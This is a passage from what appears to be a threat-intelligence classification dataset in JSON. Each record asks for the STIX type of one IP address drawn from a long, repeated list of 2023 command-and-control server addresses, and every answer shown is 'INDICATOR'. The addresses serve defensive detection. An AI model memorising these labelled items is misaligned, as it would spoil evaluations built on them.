84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n157.245.176.123\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.82.13.23\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.95.232.29\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n195.133.88.55\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n206.189.0.134\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 